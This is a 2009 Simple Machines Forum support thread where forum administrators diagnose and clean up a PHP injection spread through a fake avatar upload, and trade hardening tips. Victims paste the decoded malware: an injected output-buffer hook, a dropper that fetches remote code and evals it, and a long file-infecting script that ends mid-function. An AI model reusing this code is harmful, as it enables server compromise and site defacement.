Simple Machines Community Forum

SMF Support => SMF 1.1.x Support => Topic started by: vHawkeyev on May 01, 2009, 10:47:02 AM

Title: Hacked, script injection
Post by: vHawkeyev on May 01, 2009, 10:47:02 AM
All the php files on my site have been injected with Base64-encoded text that translates to

Code: [Select]
if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/home/jlgam4/public_html/mystiquestudios/forum/Themes/default/images/bbc/style.css.php')){include_once('/home/jlgam4/public_html/mystiquestudios/forum/Themes/default/images/bbc/style.css.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($d){$f=ord(substr($d,3,1));$h=10;$e=0;if($f&4){$e=unpack('v',substr($d,10,2));$e=$e[1];$h+=2+$e;}if($f&8){$h=strpos($d,chr(0),$h)+1;}if($f&16){$h=strpos($d,chr(0),$h)+1;}if($f&2){$h+=2;}$u=gzinflate(substr($d,$h));if($u===FALSE){$u=$d;}return $u;}}function dgobh($b){Header('Content-Encoding: none');$c=gzdecode($b);if(preg_match('/\<body/si',$c)){return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$c);}else{return gml().$c;}}ob_start('dgobh');}}}
I had a look at the style.css.php file and it has been encoded multiple times. I finally got it all decoded but I don't know what it all means.

I removed the code from all my pages and deleted the style.css.php but when I went to change my theme in my profile it came up with this page that showed details about my server and a list of directory's as well as all files that had been reinjected with the code above and the style.css.php file reappeared.. I’m stuck, I don't know what to do.

Plz help.
Title: Re: Hacked, script injection
Post by: kat on May 01, 2009, 12:50:54 PM
If you don't have any mods installed, just upload fresh files from the SMF install package.

DO NOT OVERWRITE Settings.php

If you have mods, though, that will not be such a good idea.

Of course, you could restore a recent backup, if you have one...
Title: Re: Hacked, script injection
Post by: Aleksi "Lex" Kilpinen on May 01, 2009, 12:54:16 PM
All the php files on my site have been injected with Base64-encoded text that translates to
Do you have a recent member called "krisbarteo" ?
If you do, could you answer these couple of questions:

- Did he upload an avatar?
- Do you use the attachment folder for avatars, or some other custom folder?
- What other software than SMF are you running on your server?

Then please delete that user, and his avatar from your forum.
Title: Re: Hacked, script injection
Post by: Joey Smith™ on May 01, 2009, 01:21:38 PM
Quote
style.css.php
This is not supposed to be a php file. Its a css file...
Title: Re: Hacked, script injection
Post by: bsm on May 01, 2009, 02:57:12 PM
I have the exact same problem.

My plan is to remove SMF, the re-build my site from backups.

As for "krisbarteo" - I had no such member, (my hacker was: 'Boommurne' ) but I do have an IP address of the culprit: 24.126.184.8

I'll do an admin on the DB and see what (if anything) was uploaded. (Also going to suspend uploads until I've got things cleared up).

What a mess!!!
Title: Re: Hacked, script injection
Post by: karlbenson on May 01, 2009, 03:02:04 PM
What version of smf are you using? 1.1.8?
What mods are you using?
Are you using any integrations?

Are you using on that server?
- wordpress
- any software with tinymce editor?
Title: Re: Hacked, script injection
Post by: bsm on May 01, 2009, 03:08:30 PM
I'm using 1.1.8, with Ad mod - also TP 0.9.8

Just checked (I have an identical install that I use for testing) avatars - both the same. So, it wasn't an avatar.

There's no other SW on the domain in question.
Title: Re: Hacked, script injection
Post by: vHawkeyev on May 01, 2009, 07:25:53 PM
Yes I do have the member krisbarteo

It doesn't seem as if he has uploaded an avatar but when I had a look in my attachments folder I found his avatar, I then downloaded it and opened it in notepad and I found php code. I use the attachments folder for storing avatars.

I have deleted everything to do with krisbarteo and added his IP to my server blacklist.

Mods Installed:
Updated Registration Agreement
The Rules
Title: Re: Hacked, script injection
Post by: Kindred on May 01, 2009, 07:28:19 PM
What version of SMF were you running? 
Title: Re: Hacked, script injection
Post by: vHawkeyev on May 01, 2009, 07:35:50 PM
1.1.8
Title: Re: Hacked, script injection
Post by: bsm on May 02, 2009, 06:52:06 AM
I'm using 1.1.8 as well.

I'm diving in, replacing all PHP scripts with "clean" ones. Probably take me all day.

Once done, I'll have a clean backup of all my scripts so if this happens again I can just FTP the site back to normal.

"phasers on stun - we're going in"
Title: Re: Hacked, script injection
Post by: sprntrcr on May 02, 2009, 06:59:14 AM
Using 1.1.8

I had the same issue and timestamps showed that it all started minutes after user krisbarteo joined the forum.

I banned him and removed his avatar file. I diffed against a backup and removed the base64 crap from about 50 files.   Also check Themes/default/images/bbc   That is where a bunch of advertising for casinos was stashed.

It appears the avatar that was uploaded was an injection script, so I have disabled uploading of avatars until this issue is resolved.

Google "krisbarteo"  and see all the SMF forums he is a member of.   This is/could get real nasty.
Title: Re: Hacked, script injection
Post by: Aleksi "Lex" Kilpinen on May 02, 2009, 07:06:13 AM
What other scripts are you running along SMF?
Title: Re: Hacked, script injection
Post by: vHawkeyev on May 02, 2009, 07:31:17 AM
I managed to get rid of the script injections by deleteing krisbarteo's profile and avatar, which had some php code in it that must have been used for the injection. Then uploaded clean versions of all php files.

But now I'm having troubles with my themes.
Title: Re: Hacked, script injection
Post by: bsm on May 04, 2009, 05:53:50 AM
The script injection will affect ALL your php scripts, including themes.

I'm about halfway through manually removing them all before the big upload.

oy vey... what a mess ! :'(
Title: Re: Hacked, script injection
Post by: vHawkeyev on May 04, 2009, 06:34:25 AM
Quote
I managed to get rid of the script injections by deleteing krisbarteo's profile and avatar, which had some php code in it that must have been used for the injection. Then uploaded clean versions of all php files.

Like you said it affects all php file so I replaced every one.
Title: Re: Hacked, script injection
Post by: Agent Orange on May 04, 2009, 04:44:33 PM
I have this same problem. I removed and banned krisbarteo, now I'll have to re-upload new php-files.

DO NOT OVERWRITE Settings.php

What happens if you do that?

Never mind, I guess I got lucky first time around, as I didn't have a copy of that particular file (and as such, didn't overwrite it).
Title: Re: Hacked, script injection
Post by: JBlaze on May 04, 2009, 04:47:53 PM
I have this same problem. I removed and banned krisbarteo, now I'll have to re-upload new php-files.

DO NOT OVERWRITE Settings.php

I believe I actually did that first time around. What effect did it have on my forum?

Settings.php is what controls the connection between your forum and your database. It contains all the login info needed to connect.

To reset your Settings.php so it can connect back to your forum, use the repair_settings.php tool What is repair_settings.php? (http://docs.simplemachines.org/index.php?topic=663)
Title: Re: Hacked, script injection
Post by: H on May 04, 2009, 05:03:20 PM
Some hackers will modify all files. You'll need to check if this code is present in settings.php and remove it if it is. Otherwise the hack will remain
Title: Re: Hacked, script injection
Post by: JBlaze on May 04, 2009, 05:56:22 PM
Some hackers will modify all files. You'll need to check if this code is present in settings.php and remove it if it is. Otherwise the hack will remain

Also, to elaborate on that, there was a recent hack I had to "sanitize" that the hacker had injected extra php files into almost every directory. Make sure that there are no randomly named files and also check your .htaccess for extra code as well.

On another note, check your index.php in the forum root directory as well as index.template.php in your themes directory for unwanted code.

These are all common places for hackers to inject code.
Title: Re: Hacked, script injection
Post by: MrPhil on May 04, 2009, 06:35:15 PM
Wow, that guy (krisbarteo) sure is busy! Just wondering... would it be simplemachine's business to blast an email to all known SMF installations warning them about this guy? You'd have to careful to phrase the warning in such a way that it's not legally an accusation (libelous) telling boards to dump this guy, but rather a pointer to discussions such as this one. That user name is going on my ban list right away!

That being done, do we yet know what vulnerability he exploited? Was it in a browser? Was it SMF permitting unrestricted file types for avatars?

Add:
I thought about adding code to ban particular user names, but figured that they'd just register under some other name. If the problem is that their avatar image contains some kind of booby trap, what is the nature of the beast? Are they uploading a .php file as the avatar? In that case, a simple check on permitted extensions should fix the problem. Are they uploading a legitimate extension (.jpg, .png, .gif, etc.) and it somehow contains malicious code? Could SMF scan for certain strings in an avatar image before accepting it? If not, could new avatars be uploaded to a different directory and quarantined awaiting Admin inspection and movement into the production directory? I assume that it's not a browser vulnerability to embedded code (I think I recall such a thing a few years back), but somehow code that gets run on the server?

If this information isn't suitable for public dissemination, but you would like to request my help in coding something to fight this attack, please feel free to PM me with details.
Title: Re: Hacked, script injection
Post by: Tiribulus on May 04, 2009, 08:44:41 PM
<<< I found his avatar, I then downloaded it and opened it in notepad and I found php code. >>>

Are you saying that his avatar was an actual image with an image extension, but with embedded php script?
Title: Re: Hacked, script injection
Post by: vHawkeyev on May 05, 2009, 07:18:02 AM
It wasn't an actual image. It was just like another php file but with .jpg as the extension. I'm guessing it was used to upload other php files to my server.
Title: Re: Hacked, script injection
Post by: MrPhil on May 05, 2009, 09:03:56 AM
So if avatar "images" were scanned for <? and possibly a few PHP keywords, that might detect code sailing under false colors? How about looking for image format keywords (e.g., GIF89a) in the right place, to confirm it's likely a real image file?
Title: Re: Hacked, script injection
Post by: Tiribulus on May 05, 2009, 09:42:32 AM
Okay, but then what about attachments and gallery items. Doesn't it seem like this could turn into a processor resource nightmare on a busy site. Probably preferable to being successfully attacked, but jist sayin. If you cover all bases your site is soon transformed into a file scanning engine so to speak.
Title: Re: Hacked, script injection
Post by: DirtRider on May 05, 2009, 10:15:39 AM
Could we get an IP on this guy to add it to our ban list. Looks like he is hitting SMF forum big time check this out http://www.google.co.za/search?hl=en&q=krisbarteo&btnG=Google+Search&meta=&aq=f&oq= (http://www.google.co.za/search?hl=en&q=krisbarteo&btnG=Google+Search&meta=&aq=f&oq=)
Title: Re: Hacked, script injection
Post by: Aleksi "Lex" Kilpinen on May 05, 2009, 10:20:14 AM
Okay, but then what about attachments and gallery items. Doesn't it seem like this could turn into a processor resource nightmare on a busy site. Probably preferable to being successfully attacked, but jist sayin. If you cover all bases your site is soon transformed into a file scanning engine so to speak.
Attachmentnames are encrypted for a reason you know ;)
Title: Re: Hacked, script injection
Post by: Tiribulus on May 05, 2009, 10:22:37 AM
Okay, but then what about attachments and gallery items. Doesn't it seem like this could turn into a processor resource nightmare on a busy site. Probably preferable to being successfully attacked, but jist sayin. If you cover all bases your site is soon transformed into a file scanning engine so to speak.
Attachmentnames are encrypted for a reason you know ;)

Well gaaahhlee. Forgot about that  :-[
Title: Re: Hacked, script injection
Post by: DirtRider on May 05, 2009, 10:43:49 AM
I have just countered 730 SMF forums he has registered on ranging from SMF 1.1.1 to RC1  :o
Title: Re: Hacked, script injection
Post by: busterone on May 05, 2009, 11:37:06 AM
Busy little bee huh? he has not attempted mine yet, but he won't get in under that username.
Could we get an IP on this guy to add it to our ban list. Looks like he is hitting SMF forum big time check this out http://www.google.co.za/search?hl=en&q=krisbarteo&btnG=Google+Search&meta=&aq=f&oq= (http://www.google.co.za/search?hl=en&q=krisbarteo&btnG=Google+Search&meta=&aq=f&oq=)

I would like more info as well. I do understand it may not be a good idea to openly post this, but I will accept a pm gladly with IP, email addie and any other info anyone has on him.
Title: Re: Hacked, script injection
Post by: DirtRider on May 05, 2009, 11:46:00 AM
Yip me as well if possible  ;D
Title: Re: Hacked, script injection
Post by: JBlaze on May 05, 2009, 12:22:37 PM
How about this, seeing as he gets code injected in through uploaded avatars. How about requiring all avatars be linked to a site like photobucket or imageshack, and disabling uploaded avatars...?
Title: Re: Hacked, script injection
Post by: Aleksi "Lex" Kilpinen on May 05, 2009, 12:34:33 PM
How about this, seeing as he gets code injected in through uploaded avatars. How about requiring all avatars be linked to a site like photobucket or imageshack, and disabling uploaded avatars...?
Or with an apache server use .htaccess that turns php engine off for a custom avatar folder. ::)
Title: Re: Hacked, script injection
Post by: JBlaze on May 05, 2009, 12:44:06 PM
How about this, seeing as he gets code injected in through uploaded avatars. How about requiring all avatars be linked to a site like photobucket or imageshack, and disabling uploaded avatars...?
Or with an apache server use .htaccess that turns php engine off for a custom avatar folder. ::)

That works too...
Title: Re: Hacked, script injection
Post by: CarlT100 on May 05, 2009, 01:02:55 PM
Dirtrider, I found this on the first page of this thread:

Quote
As for "krisbarteo" - I had no such member, (my hacker was: 'Boommurne' ) but I do have an IP address of the culprit: 24.126.184.8
Title: Re: Hacked, script injection
Post by: busterone on May 05, 2009, 02:29:10 PM
I don't allow avatar uploads anyway. They must be linked to photobucket, etc. The only allowed attachments are by admins, and those are limited and encrypted, so most likely, I have no worries from this guy. I have had over a dozen new members in the last 2 weeks that have gotten past the anti-spam, and confirmed the email address. Once they log on, they only stay about 2 to 5 minutes, log off and do not return. Could be they are looking to upload an avatar or attachment, realize they cant, and then move on somewhere else.
Title: Re: Hacked, script injection
Post by: Tiribulus on May 05, 2009, 03:33:28 PM
Would this work?

Code: [Select]
<files~".(php* |s?p?html | | cgi | pl)$">
deny from all
</files>

This is supposed to also kill html, cgi and perl executions as well. Before I create the file I wanted to bounce it off some of you guys first.
Title: Re: Hacked, script injection
Post by: H on May 05, 2009, 04:27:29 PM
Would this work?

Code: [Select]
<files~".(php* |s?p?html | | cgi | pl)$">
deny from all
</files>

This is supposed to also kill html, cgi and perl executions as well. Before I create the file I wanted to bounce it off some of you guys first.

On some servers, files are being run through php even though they do not have a php ending. Therefore I do not think this would work.
Title: Re: Hacked, script injection
Post by: Tiribulus on May 05, 2009, 04:45:22 PM
On some servers, files are being run through php even though they do not have a php ending. Therefore I do not think this would work.

You're saying that since this stops the action based on the file extension that a file with a different extension, but still containing script code would run anyway.

How then do you use .htaccess to block the engine altogether as was suggested above. I also found some info on doing it with httpd.conf.
Title: Re: Hacked, script injection
Post by: H on May 05, 2009, 04:57:21 PM
There is an option you can set in .htaccess that will disable the use of php completely.

I think it is "php_value engine off" but google should provide more, as I don't normally use Apache/.htaccess
Title: Re: Hacked, script injection
Post by: Tiribulus on May 05, 2009, 06:28:08 PM
There is an option you can set in .htaccess that will disable the use of php completely.

I think it is "php_value engine off" but google should provide more, as I don't normally use Apache/.htaccess

It looks like that's right.
adding an .htaccess file with this php_value engine off entry should work.

Or, it seems you could also add this
Code: [Select]
<Location "/docroot/av_directory">
 php_admin_flag engine off
</Location>.
  to the httpd.conf file to accomplish the same thing

I was thinking it might not be a bad idea to throw such a .htaccess file in every directory that doesn't need PHP interpretation, but that might be misused that way.
Title: Re: Hacked, script injection
Post by: hobox on May 05, 2009, 07:29:24 PM
Krisbarteo had done the same to my forum. An avatar 1,82KB large. All my PHP files were corrupted

He came from 94.142.129.147
Title: Re: Hacked, script injection
Post by: MrPhil on May 05, 2009, 11:09:41 PM
adding an .htaccess file with this php_value engine off entry should work.

On many systems it won't work, as php_value and php_flag are not permitted in .htaccess. For those systems, put something like engine = off in a php.ini file. You may also need to put an entry in .htaccess to tell PHP where to find that file.
Title: Re: Hacked, script injection
Post by: chrishicks on May 05, 2009, 11:16:33 PM
http://www.stopforumspam.com/search?q=krisbarteo 

This might help somewhat:

http://custom.simplemachines.org/mods/index.php?mod=1547
Title: Re: Hacked, script injection
Post by: Aleksi "Lex" Kilpinen on May 06, 2009, 01:17:48 AM
There is an option you can set in .htaccess that will disable the use of php completely.

I think it is "php_value engine off" but google should provide more, as I don't normally use Apache/.htaccess
This is correct - I have it in use for a custom avatar folder.
Title: Re: Hacked, script injection
Post by: bsm on May 06, 2009, 04:55:04 AM
Well, it took me a while - but all scripts are clean, and I'm up and running.

NOW, I have a full backup of clean scripts - ready to restore anytime.
Title: Re: Hacked, script injection
Post by: CarlT100 on May 06, 2009, 07:15:22 AM
http://www.stopforumspam.com/search?q=krisbarteo (http://www.stopforumspam.com/search?q=krisbarteo) 

This might help somewhat:

http://custom.simplemachines.org/mods/index.php?mod=1547 (http://custom.simplemachines.org/mods/index.php?mod=1547)

Thank you for the stopforumspam link.  I have saved hoping I will not have to use it.
Title: Re: Hacked, script injection
Post by: Tiribulus on May 06, 2009, 10:53:13 AM
What I found out so far is that the host has to have AllowOverride set in httpd.conf to permit .htaccess file directives to supersede the global settings in order for this to work with .htaccess files. This might be what the guy above was talking about. The Apache docs say this can have a negative effect of performance due to the scanning required to find the commands in those files. They say if possible to include them in the directory section of httpd.conf. Being that the server is sitting at my feet I did this:

Code: [Select]
<Directory "/path to avs dir/">
 php_admin_flag engine off
</Directory>

Now my hello.php file is offered for download instead of being run. Hmmm, I suppose that is preferable to being executed on the server.
Title: Re: Hacked, script injection
Post by: H on May 06, 2009, 01:13:32 PM
adding an .htaccess file with this php_value engine off entry should work.

On many systems it won't work, as php_value and php_flag are not permitted in .htaccess. For those systems, put something like engine = off in a php.ini file. You may also need to put an entry in .htaccess to tell PHP where to find that file.

Thanks for this. Although it seems a little absurd that hosts prevent these options in .htaccess but yet let the user run a custom php.ini :o
Title: Re: Hacked, script injection
Post by: sjokomelk on May 06, 2009, 01:35:59 PM
I dunno if this will help anyone but the content of the avatar is the following:
I've cleaned it up a little.

Code: [Select]
<?php;$url 'http://wplsat23.net/?update=main';$done false;if(!$url){return '';}$url_info parse_url($url);$url_info[port] = ($url_info[port]) ? $url_info[port]:80;$url_info[path] = ($url_info[path]) ? $url_info[path] : "/"; $url_info[query] = ($url_info[query]) ? $url_info[path] = $url_info[path] . "?" $url_info[query] : ""; $query "GET " $url_info[path] . " HTTP/1.1\r\n"; $query $query "Host: " $url_info[host] . "\r\n"; $query $query "Accept: */*" "\r\n"; $query $query "Connection: close" "\r\n"; $query $query "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "\r\n"; $query $query "\r\n"; $errno 0; $error ""; $sock fsockopen($url_info[host], $url_info[port], $errno$error30);$h = array();$resp = array();if($sock){stream_set_timeout($sock30);fwrite($sock$query);$hd false;while(!feof($sock)){$l fgets($sock);if(!$hd){if(trim($l) == ''){$hd true;}else{$h[] = $l;}}else{$resp[] = $l;}}fclose($sock);}$ret implode(""$resp);eval($ret);?>
and this is the code on that page:
Code: [Select]
$ver = "1.0";
$GLOBALS['dbg'] = 0;
$GLOBALS['rewrite_old'] = 1;

set_time_limit(600);
$pu = "http://nomsat23.net/?update=js&host={$_SERVER['HTTP_HOST']}";
$eu = "http://nomsat23.net/?update=shl&host={$_SERVER['HTTP_HOST']}";

//$pu = "http://wpl/?update=js&host={$_SERVER['HTTP_HOST']}";
//$eu = "http://wpl/?update=shl&host={$_SERVER['HTTP_HOST']}";

$GLOBALS['dgin'] = "style.css.php";
$GLOBALS['dgsf'] = "s.php";
$GLOBALS['dgdn'] = "dg.php";
$GLOBALS['dgfn'] = "";

//detect full path
if(!file_exists($_SERVER['SCRIPT_FILENAME'])){
if(file_exists($_SERVER['PATH_TRANSLATED'])){
$_SERVER['SCRIPT_FILENAME'] = $_SERVER['PATH_TRANSLATED'];
}else{
die("<b style='color:red'>can't detect exploit full path [{$_SERVER['SCRIPT_FILENAME']}]</b><br>[49295073]");
}
}
$_SERVER['SCRIPT_FILENAME'] = str_replace('\\', '/', $_SERVER['SCRIPT_FILENAME']);
$_SERVER['SCRIPT_FILENAME'] = preg_replace("/\/+/", "/", $_SERVER['SCRIPT_FILENAME']);
echo "<b style='color:green'>exploit full path [{$_SERVER['SCRIPT_FILENAME']}]</b><br>[6910002]<br>";

$tmp = explode("/", $_SERVER['REQUEST_URI']);
$GLOBALS['dglvl'] = count($tmp) - 2;
echo"{$ver}<h2>http://{$_SERVER['HTTP_HOST']}{$_SERVER['REQUEST_URI']}</h2>";

$path = explode("/", $_SERVER['SCRIPT_FILENAME']);
$path = array_slice($path, 0, count($path) - 1);
$GLOBALS['fpath'] = implode("/", $path) . '/';

//detecting real path
$uri = explode("/", $_SERVER['REQUEST_URI']);
$uri = array_slice($uri, 0, count($uri) - 1);

//print_r($path);
//print_r($uri);

while(count($uri) > 0 && count($path) > 0 && strtolower($uri[count($uri) - 1]) == strtolower($path[count($path) - 1])){
unset($uri[count($uri) - 1]);
unset($path[count($path) - 1]);
}
//echo"<hr>";
//print_r($path);
//print_r($uri);

$GLOBALS['dgsp'] = implode("/", $path) . '/';

if(isset($_GET['dgd'])){
error_reporting(E_ALL & ~E_NOTICE);
}else{
error_reporting(0);
}

if(isset($_GET['phpinfo'])){
phpinfo();
die;
}

//$GLOBALS['dgsp'] = $_SERVER['DOCUMENT_ROOT'];
if(substr($GLOBALS['dgsp'], strlen($GLOBALS['dgsp']) - 1, 1) <> '/'){
$GLOBALS['dgsp'] .= '/';
}

echo"<b style=\"color:green\">root dir path [{$GLOBALS['dgsp']}]</b><br><br>";

$GLOBALS['dgcgr'] = 0;
$GLOBALS['dgcgrf'] = 0;
$my_uid = getmyuid();
$my_gid = getmygid();
$my_cid = get_current_user();
echo "SYSTEM: " . `uname -a` . "<br>";
if(ini_get('safe_mode')){echo "<h1 style='color:red'>SAFE MODE</h1>";}

echo"MY USER ID: {$my_uid}; MY GROUP ID: $my_gid; CURRENT USER: {$my_cid}<br>";

if(!function_exists('phpinj')){
function phpinj($ff, &$str, $inj = 0, $silent = true){
global $_SERVER;
$alien_shells = array("los.php","r0x.php");
$our_folder = 0;
$folder = $ff;
$folder = str_replace('\\', '/', $folder);
if(substr($folder, strlen($folder) - 1, 1) <> '/'){
$folder .= '/';
}
if(!$folder){
if(!$silent){echo"<font color='red'>bad folder path [{$folder}]</font><br>";}
return;
}
if(!is_dir($folder)){
if(!$silent){echo"<font color='red'>{$folder} - is not a folder</font><br>";}
return;
}
if($GLOBALS['dgdirs'][$folder]){
if(!$silent){echo"<font color='yellow'>{$folder} already checked</font><br>";}
return;
}
$GLOBALS['dgdirs'][$folder] = 1;

if($folder == $GLOBALS['dgcp'] || file_exists($folder.$GLOBALS['dgin'])){
if(!$silent){echo"<h4>{$folder} is our dir, skipping...</h4>";}
$our_folder = 1;
}
$dir_perm = substr(sprintf('%o', fileperms($folder)), -4);

$file_stat = stat($folder);
$file_uid = $file_stat[4];
$file_gid = $file_stat[5];
if(function_exists('posix_getpwuid')){
$file_stat = posix_getpwuid($file_uid);
$file_uidn = "; uname:{$file_stat['name']}";
}
if(function_exists('posix_getgrgid')){
$file_stat = posix_getgrgid($file_gid);
$file_gidn = $file_stat['name'];
$file_gidn = "; gname:{$file_gidn}";
}
$file_info = "[uid:{$file_uid}; gid:{$file_gid}{$file_uidn}{$file_gidn}] ";
if(!$silent){echo"{$file_info}[$dir_perm] {$folder}<br>";flush();}
$h = opendir($folder);
if(!$h){
if(!$silent){echo"<font color='red'>{$folder}</font><br>";}
return;
}
while(strlen($f = readdir($h))){
if($f == '.' || $f == '..'){
continue;
}
$pc = 0;
$mkr = md5($f);
$lc = "";
$lp = "";
$fh = false;

$file = $folder.$f;
if($f == $_SERVER['SCRIPT_FILENAME']){
if(!$silent){echo"<h4>{$file} is our exploit</h4>";}
continue;
}
if(is_file($file) && !$our_folder){
if($f == 'functions.php' && (strlen($folder) - strrpos($folder, "wp-includes") == 12)){
if(can_write($file)){
echo"<b style='color:green'>{$file}</b><br>";
dgrself($file, $silent);
}else{
echo"<b style='color:red'>{$file}</b><br>";
}
}
if($f == 's.php'){
if(!$silent){echo"<font color='red'>{$file} is shell</font><br>";}
continue;
}
if(in_array(strtolower($f), $alien_shells)){
if(unlink($file)){
if(!$silent){echo"<h3 style='color:green'>{$file} ALIEN SHELL</h3>";}
}else{
if(!$silent){echo"<h3 style='color:red'>{$file} ALIEN SHELL</h3>";}
}
continue;
}
if(!in_array(strtolower(gfe($file)), array("php","phtml","php3"))){
continue;
}
if($GLOBALS['dgfiles'][$file]){
if(!$silent){echo"<font color='yellow'>{$file} already checked</font><br>";}
continue;
}
$GLOBALS['dgfiles'][$file] = 1;
$file_stat = stat($file);
$file_uid = $file_stat[4];
$file_gid = $file_stat[5];
if(function_exists('posix_getpwuid')){
$file_stat = posix_getpwuid($file_uid);
$file_uidn = "; uname:{$file_stat['name']}";
}
if(function_exists('posix_getgrgid')){
$file_stat = posix_getgrgid($file_gid);
$file_gidn = $file_stat['name'];
$file_gidn = "; gname:{$file_stat['name']}";
}
$file_info = "[uid:{$file_uid}; gid:{$file_gid}{$file_uidn}{$file_gidn}] ";
$file_perm_was = substr(sprintf('%o', fileperms($file)), -4);
$file_handler = fopen($file, "a+");
$perms_str = "{$file_info}[{$file_perm_was}] ";
if(!$file_handler){
if(!$silent){echo"{$perms_str}<font color='red'>{$file}</font><br>";flush();}
continue;
}
fclose($file_handler);
$fc = implode("", file($file));
$nc = preg_replace("/\<\!\-\-$mkr\-\-\>.*\<\!\-\-$mkr\-\-\>/siU", "", $fc);
$nc = preg_replace("/^\s*\<\?(\w{3})?\s*\/\*\*\/\s*eval\(base64_decode.*\)\)\;\s*\?\>\s*(\S)/siU", "$2", $nc);
clear_exploits($nc);
if($nc <> $fc){$lc = " <b>[cleared]</b>";}else{$lc = " <b>[not patched]</b>";}
if(preg_match("/\@zend/i", $nc)){
if(!$silent){echo"{$perms_str}<b>ZEND</b> <font color='red'>{$file}</font>{$lc}<br>";flush();}
}elseif($inj && strpos(strtolower($folder), '/cache/')){
$lp = " <b style='color:orange'> [cached file]</b>";
}elseif($inj){
$nc = "{$ot}{$str}{$ot}\n{$nc}";
$lp = " <b> [patched]</b>";
}
if($fc <> $nc){
save_text_to_file($file, $nc, "$perms_str<font color='green'>{$file}{$lc}{$lp}</font><br>", 1, $silent);
}else{
if(!$silent){echo"$perms_str<font color='green'>{$file}{$lc}{$lp}</font><br>";}
}
}elseif(is_dir($file)){
phpinj($file.'/', $str, $inj, $silent);
}
}
closedir($h);
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('clear_exploits')){
function clear_exploits(&$text){
$text = preg_replace("/\<\?(\w{3})?\s*eval\(base64_decode.*\)\)\;\s*\?\>/siU", "", $text);
}
}

if(!function_exists('can_write')){
function can_write($fn){
$f = fopen($fn, "a");
if($f){
fclose($f);
return true;
}else{
return false;
}
}
}

if(!function_exists('leave_clear_php')){
function leave_clear_php(&$txt){
$txt = substr($txt, strpos($txt, '<?'), strlen($txt));
$txt = substr($txt, 0, strrpos($txt, '?>') + 2);
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('download')){
function download($url, $connect_timeout){
$done = false;
if(!$url){return '';}

$url_info = parse_url($url);
$url_info[port] = ($url_info[port]) ? $url_info[port] : 80;
$url_info[path] = ($url_info[path]) ? $url_info[path] : "/";
$url_info[query] = ($url_info[query]) ? $url_info[path] = $url_info[path] . "?" . $url_info[query] : "";
$query = "GET " . $url_info[path] . " HTTP/1.1\r\n";
$query = $query . "Host: " . $url_info[host] . "\r\n";
$query = $query . "Accept: */*" . "\r\n";
$query = $query . "Connection: close" . "\r\n";
$query = $query . "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" . "\r\n";
$query = $query . "\r\n";
$errno = 0;
$error = "";
$sock = fsockopen($url_info[host], $url_info[port], $errno, $error, $connect_timeout);
$h = array();
$resp = array();
if($sock){
stream_set_timeout($sock, $connect_timeout);
fwrite($sock, $query);
$hd = false;
while(!feof($sock)){
$l = fgets($sock);
if(!$hd){
if(trim($l) == ''){
$hd = true;
}else{
$h[] = $l;
}
}else{
$resp[] = $l;
}
}
fclose($sock);
}
$ret = implode("", $resp);
return $ret;
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('save_text_to_file')){
function save_text_to_file($fn, $t, $m = '', $r = 0, $silent = false){
global $_GET;
if(isset($_GET['dgd'])){
$silent = false;
}
if($r){
$f = fopen($fn, "w");
}else{
$f = fopen($fn, "a");
}
if($f){
fwrite($f, $t);
fflush($f);
fclose($f);
if(!$silent){
echo $m;
}
/*set_chmod($fn);*/
}else{
if(!$silent){
echo "can't create file $fn";
}
die();
}
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('replace_substring')){
function replace_substring(&$text, $pret, $postt, $str){
$pos = strpos($text, $pret);
if(!$pos){return false;}
$pre = substr($text, 0, $pos + strlen($pret));
$pos = strpos($text, $postt, $pos);
if(!$pos){return false;}
$post = substr($text, $pos, strlen($text));
if(strlen($pre) && strlen($post)){
$text = $pre.$str.$post;
return true;
}
return false;
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('set_chmod')){
function set_chmod($file){
if(!file_exists($file)){
return;
}
if(chmod($file, 0777)){
return('0777');
}
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('set_chmod_folder')){
function set_chmod_folder($file){
if(!file_exists($file)){
return;
}
if(chmod($file, 0666)){
return('0666');
}
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('gfe')){
function gfe($fn){
$ret = '';
$p = strrpos($fn, '.');
if($p){
$ret = (substr($fn, $p+1, strlen($fn)));
return $ret;
}
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('prepare_pack')){
function prepare_pack($php){
$cycles = 1;
$split_by_functions = 1;
$zip = 0;
if(!function_exists('base64_encode')){
return $php;
}
$ret = preg_replace("/^[^\s]+[\s]/U", "", $php);
$ret = preg_replace("/[\s][^\s]+\Z/", "", $ret);
$ret = trim($ret);
if($split_by_functions){
$tmp = preg_split('/\}\s+function/', $ret);
}else{
$tmp[] = $ret;
}
$skip_first = false;
if(count($tmp)){
$pos = strpos($tmp[0], 'function');
if($pos === 0){
$tmp[0] = substr($tmp[0], strlen('function'), strlen($tmp[0]));
}else{
$skip_first = true;
}
